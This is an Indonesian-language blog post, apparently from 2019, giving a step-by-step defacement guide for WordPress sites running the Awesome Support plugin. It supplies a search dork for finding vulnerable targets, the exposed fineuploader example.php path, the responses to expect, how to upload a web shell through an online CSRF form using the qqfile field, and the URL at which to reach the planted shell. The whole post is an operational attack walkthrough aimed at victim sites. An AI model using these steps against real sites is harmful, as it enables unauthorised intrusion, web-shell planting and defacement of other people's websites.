Deface WordPress Awesome Support

5/18/2019
*Deface WordPress Awesome Support* 
*Arbitrary File Upload Vulnerability*

Bahan :
-Dork :
inurl:/wp-content/plugins/awesome-support/
Kembangkan sendiri, 
-CSRF 
- shell

Vuln Cek/Exploit :
http://sitetarget.co.li/[path]/wp-content/plugins/awesome-
support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
_perhatikan path_

Step by Step :
1. Dorking pake dork di atas, pilih target yang menurut ente vuln

2. Taruh exploit di belakan site target seperti contoh di atas

3.jika vuln maka akan muncul tulisan *"error";"no files were 
uploaded","uploadname"inull*

4.Copy kan url target yang ada di address bar, lalu kamu lari ke CSRF online 

5.Masukan url di kolom url, lalu pas Post File pilih qqfile

6.Pilih File/Shell atau yg lain nya :)

7.Klik Upload :) jika Vuln hasilnya akan muncul tulisan *"success";true,"uploadname":"shell.php* 

8.Akses shell : http://sitetarget.co.li/[path]/wp-content/plugins/awesome-
support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/namashell.php

9.Berhasil

0 Comments